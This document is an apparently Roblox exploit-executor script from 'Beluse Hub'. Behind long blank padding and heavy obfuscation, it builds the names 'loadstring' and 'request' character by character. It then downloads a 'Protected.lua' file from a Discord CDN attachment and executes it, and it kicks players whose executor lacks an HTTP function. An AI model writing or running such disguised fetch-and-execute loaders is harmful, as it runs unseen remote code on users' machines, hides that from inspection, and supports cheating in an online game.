--[[
    Script by Beluse Hub, discord.gg/wWvyZM2xbj
     ____       _                  _    _       _     
    |  _ \     | |                | |  | |     | |    
    | |_) | ___| |_   _ ___  ___  | |__| |_   _| |__  
    |  _ < / _ \ | | | / __|/ _ \ |  __  | | | | '_ \ 
    | |_) |  __/ | |_| \__ \  __/ | |  | | |_| | |_) |
    |____/ \___|_|\__,_|___/\___| |_|  |_|\__,_|_.__/ 
]]

local a,b,c="my ass hurts",nil,nil;
function c(a,b,c)
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
end















do
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    





































local atTVzarLndvabHaEUJwzJ= {_hiwwZbCBUOc = 109  , _AGUhPdcNBhw = 101  , _AdTYyeVJgji = 114 , _MeUQcGmkroY = 101 , _CTsjSEGmLoN = 113 , _OurLtKPxRoC = 117 , _XVJCpNUTXKS = 115 , _kwdjCMUbRCz = 116 , _dXSEiVkwwsA = 104 , _NNkrwlQwasj = 112 , _cMwJwRGRThJ = 95 , _RGAnxiGbfrf = 108 , _MQuCdwKQeKF = 111 , _uwzGLxAAVnA = 97 , _TggHBPHliMV = 100 , _NgzctiedKee = 105 , _MynRcNwaSyY = 110 , _aXmqPCVrPCx = 103 , _QzdePbliHcZ = 121 , _TyJvbjsnUFg = 32 , _kQmbUYXpGdH = 120 , _heNUzVptiKR = 99 , _mCPtaeOBAHr = 58 , _wKcOiKeTggH = 47 , _RcyNURkaEkf = 46 , _RKvkSZswcXQ = 109 , _jJlbbsvRiHv = 57 , _nlrMQwEqlsz = 50 , _dvFaQInXcTo = 56 , _GGFKGRVGZex = 51 , _eViaeuUHfac = 55 , _IOqmRMAMRKi = 53 , _odNHFvkQTSy = 49 , _sntNubAyYVN = 54 , _fnpIfmpEawd = 48 , _qcojQpXATCq = 52 , _cBwJjfKwpmU = 80 , _pQZVRxfscPc = 71 , _XrevsnFTXyp = 69 , _gfdzaBORZBa = 84 }local dRwNhzGtzflcvaOKNQcwx=string;local EHmFqRjgidPxMGHCYJFyp=getfenv()[dRwNhzGtzflcvaOKNQcwx.char( ( function ( SMlESFYYQRbZLuznTyYBd , JFBodOUwwHuiNwbxQToyO )
            local OKYAEpetwqYEPjzKXGYhP = {885 , 57477 and true or (not ((SMlESFYYQRbZLuznTyYBd)) and (91031)) * (JFBodOUwwHuiNwbxQToyO)((false)(((6353) + (56184)))("" + ".." .. ((7304) * (55436)) .. "")(((85977) .. (99246)))) ^ ((22641) and (44283)) , 842 , 511 , 525 }
            return #OKYAEpetwqYEPjzKXGYhP end ) ( )+98, ( function ( )
            local qduPXZqJwvRvJvQByTsid = "74DD828D7A9EDB7947AE49EDA3D0A1ED5C2A619BEB6E2BF14801F0CD31D5087FE9F99AAD0AB2BCEF80C27D3C8098B3C50"
            return #qduPXZqJwvRvJvQByTsid + 0 end ) ( ), atTVzarLndvabHaEUJwzJ._hiwwZbCBUOc, atTVzarLndvabHaEUJwzJ._AGUhPdcNBhw)..dRwNhzGtzflcvaOKNQcwx.char() .. '']local CoVlrJZBwxCxsOrGFhzLq=getfenv()[dRwNhzGtzflcvaOKNQcwx.char( atTVzarLndvabHaEUJwzJ._AdTYyeVJgji, atTVzarLndvabHaEUJwzJ._MeUQcGmkroY, atTVzarLndvabHaEUJwzJ._CTsjSEGmLoN, atTVzarLndvabHaEUJwzJ._OurLtKPxRoC, atTVzarLndvabHaEUJwzJ._MeUQcGmkroY, atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz) .. '']local sbHJohsZJybAJjsdQMLIH=getfenv()[dRwNhzGtzflcvaOKNQcwx.char( atTVzarLndvabHaEUJwzJ._dXSEiVkwwsA, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._NNkrwlQwasj, atTVzarLndvabHaEUJwzJ._cMwJwRGRThJ, atTVzarLndvabHaEUJwzJ._AdTYyeVJgji, atTVzarLndvabHaEUJwzJ._MeUQcGmkroY, atTVzarLndvabHaEUJwzJ._CTsjSEGmLoN, atTVzarLndvabHaEUJwzJ._OurLtKPxRoC, atTVzarLndvabHaEUJwzJ._MeUQcGmkroY, atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz) .. '']local kkXgZouwoHaxEfAJCLKaQ=getfenv()[dRwNhzGtzflcvaOKNQcwx.char( atTVzarLndvabHaEUJwzJ._RGAnxiGbfrf, atTVzarLndvabHaEUJwzJ._MQuCdwKQeKF, atTVzarLndvabHaEUJwzJ._uwzGLxAAVnA, atTVzarLndvabHaEUJwzJ._TggHBPHliMV, atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._AdTYyeVJgji, atTVzarLndvabHaEUJwzJ._NgzctiedKee, atTVzarLndvabHaEUJwzJ._MynRcNwaSyY, atTVzarLndvabHaEUJwzJ._aXmqPCVrPCx) .. '']local RuIYPvLiXtkITBTZQlFwg=getfenv()[dRwNhzGtzflcvaOKNQcwx.char( atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._QzdePbliHcZ, atTVzarLndvabHaEUJwzJ._MynRcNwaSyY) .. '']local MmTnKzfkTAbTKwSghxgNZ=getfenv()[dRwNhzGtzflcvaOKNQcwx.char( atTVzarLndvabHaEUJwzJ._dXSEiVkwwsA, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._NNkrwlQwasj) .. '']local dhEBnUhjzsFYhsphPAsfN=sbHJohsZJybAJjsdQMLIH or CoVlrJZBwxCxsOrGFhzLq or(RuIYPvLiXtkITBTZQlFwg and RuIYPvLiXtkITBTZQlFwg.request)or(MmTnKzfkTAbTKwSghxgNZ and MmTnKzfkTAbTKwSghxgNZ.request)if not dhEBnUhjzsFYhsphPAsfN then return EHmFqRjgidPxMGHCYJFyp.Players.LocalPlayer:Kick(dRwNhzGtzflcvaOKNQcwx.char( atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._dXSEiVkwwsA, atTVzarLndvabHaEUJwzJ._NgzctiedKee, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._QzdePbliHcZ, atTVzarLndvabHaEUJwzJ._TyJvbjsnUFg, atTVzarLndvabHaEUJwzJ._uwzGLxAAVnA, atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._TyJvbjsnUFg, atTVzarLndvabHaEUJwzJ._MeUQcGmkroY, atTVzarLndvabHaEUJwzJ._kQmbUYXpGdH, atTVzarLndvabHaEUJwzJ._MeUQcGmkroY, atTVzarLndvabHaEUJwzJ._heNUzVptiKR, atTVzarLndvabHaEUJwzJ._OurLtKPxRoC, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._MQuCdwKQeKF, atTVzarLndvabHaEUJwzJ._AdTYyeVJgji) .. "")end;kkXgZouwoHaxEfAJCLKaQ(dhEBnUhjzsFYhsphPAsfN({Url=dRwNhzGtzflcvaOKNQcwx.char( atTVzarLndvabHaEUJwzJ._dXSEiVkwwsA, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._NNkrwlQwasj, atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._mCPtaeOBAHr, atTVzarLndvabHaEUJwzJ._wKcOiKeTggH, atTVzarLndvabHaEUJwzJ._wKcOiKeTggH, atTVzarLndvabHaEUJwzJ._heNUzVptiKR, atTVzarLndvabHaEUJwzJ._TggHBPHliMV, atTVzarLndvabHaEUJwzJ._MynRcNwaSyY, atTVzarLndvabHaEUJwzJ._RcyNURkaEkf, atTVzarLndvabHaEUJwzJ._TggHBPHliMV, atTVzarLndvabHaEUJwzJ._NgzctiedKee, atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._heNUzVptiKR, atTVzarLndvabHaEUJwzJ._MQuCdwKQeKF, atTVzarLndvabHaEUJwzJ._AdTYyeVJgji, atTVzarLndvabHaEUJwzJ._TggHBPHliMV, atTVzarLndvabHaEUJwzJ._uwzGLxAAVnA, atTVzarLndvabHaEUJwzJ._NNkrwlQwasj, atTVzarLndvabHaEUJwzJ._NNkrwlQwasj, atTVzarLndvabHaEUJwzJ._RcyNURkaEkf, atTVzarLndvabHaEUJwzJ._heNUzVptiKR, atTVzarLndvabHaEUJwzJ._MQuCdwKQeKF, atTVzarLndvabHaEUJwzJ._RKvkSZswcXQ, atTVzarLndvabHaEUJwzJ._wKcOiKeTggH, atTVzarLndvabHaEUJwzJ._uwzGLxAAVnA, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._uwzGLxAAVnA, atTVzarLndvabHaEUJwzJ._heNUzVptiKR, atTVzarLndvabHaEUJwzJ._dXSEiVkwwsA, atTVzarLndvabHaEUJwzJ._RKvkSZswcXQ, atTVzarLndvabHaEUJwzJ._MeUQcGmkroY, atTVzarLndvabHaEUJwzJ._MynRcNwaSyY, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._XVJCpNUTXKS, atTVzarLndvabHaEUJwzJ._wKcOiKeTggH, atTVzarLndvabHaEUJwzJ._jJlbbsvRiHv, atTVzarLndvabHaEUJwzJ._nlrMQwEqlsz, atTVzarLndvabHaEUJwzJ._nlrMQwEqlsz, atTVzarLndvabHaEUJwzJ._dvFaQInXcTo, atTVzarLndvabHaEUJwzJ._nlrMQwEqlsz, atTVzarLndvabHaEUJwzJ._GGFKGRVGZex, atTVzarLndvabHaEUJwzJ._eViaeuUHfac, atTVzarLndvabHaEUJwzJ._IOqmRMAMRKi, atTVzarLndvabHaEUJwzJ._odNHFvkQTSy, atTVzarLndvabHaEUJwzJ._odNHFvkQTSy, atTVzarLndvabHaEUJwzJ._nlrMQwEqlsz, atTVzarLndvabHaEUJwzJ._eViaeuUHfac, atTVzarLndvabHaEUJwzJ._sntNubAyYVN, atTVzarLndvabHaEUJwzJ._dvFaQInXcTo, atTVzarLndvabHaEUJwzJ._GGFKGRVGZex, atTVzarLndvabHaEUJwzJ._fnpIfmpEawd, atTVzarLndvabHaEUJwzJ._dvFaQInXcTo, atTVzarLndvabHaEUJwzJ._nlrMQwEqlsz, atTVzarLndvabHaEUJwzJ._wKcOiKeTggH, atTVzarLndvabHaEUJwzJ._odNHFvkQTSy, atTVzarLndvabHaEUJwzJ._fnpIfmpEawd, atTVzarLndvabHaEUJwzJ._fnpIfmpEawd, atTVzarLndvabHaEUJwzJ._nlrMQwEqlsz, atTVzarLndvabHaEUJwzJ._sntNubAyYVN, atTVzarLndvabHaEUJwzJ._fnpIfmpEawd, atTVzarLndvabHaEUJwzJ._GGFKGRVGZex, atTVzarLndvabHaEUJwzJ._GGFKGRVGZex, atTVzarLndvabHaEUJwzJ._qcojQpXATCq, atTVzarLndvabHaEUJwzJ._nlrMQwEqlsz, atTVzarLndvabHaEUJwzJ._fnpIfmpEawd, atTVzarLndvabHaEUJwzJ._odNHFvkQTSy, atTVzarLndvabHaEUJwzJ._sntNubAyYVN, atTVzarLndvabHaEUJwzJ._IOqmRMAMRKi, atTVzarLndvabHaEUJwzJ._IOqmRMAMRKi, atTVzarLndvabHaEUJwzJ._nlrMQwEqlsz, atTVzarLndvabHaEUJwzJ._jJlbbsvRiHv, atTVzarLndvabHaEUJwzJ._sntNubAyYVN, atTVzarLndvabHaEUJwzJ._fnpIfmpEawd, atTVzarLndvabHaEUJwzJ._wKcOiKeTggH, atTVzarLndvabHaEUJwzJ._cBwJjfKwpmU, atTVzarLndvabHaEUJwzJ._AdTYyeVJgji, atTVzarLndvabHaEUJwzJ._MQuCdwKQeKF, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._MeUQcGmkroY, atTVzarLndvabHaEUJwzJ._heNUzVptiKR, atTVzarLndvabHaEUJwzJ._kwdjCMUbRCz, atTVzarLndvabHaEUJwzJ._MeUQcGmkroY, atTVzarLndvabHaEUJwzJ._TggHBPHliMV, atTVzarLndvabHaEUJwzJ._RcyNURkaEkf, atTVzarLndvabHaEUJwzJ._RGAnxiGbfrf, atTVzarLndvabHaEUJwzJ._OurLtKPxRoC, atTVzarLndvabHaEUJwzJ._uwzGLxAAVnA) .. "",Method=dRwNhzGtzflcvaOKNQcwx.char( atTVzarLndvabHaEUJwzJ._pQZVRxfscPc, atTVzarLndvabHaEUJwzJ._XrevsnFTXyp, atTVzarLndvabHaEUJwzJ._gfdzaBORZBa) .. ""}).Body)()end;
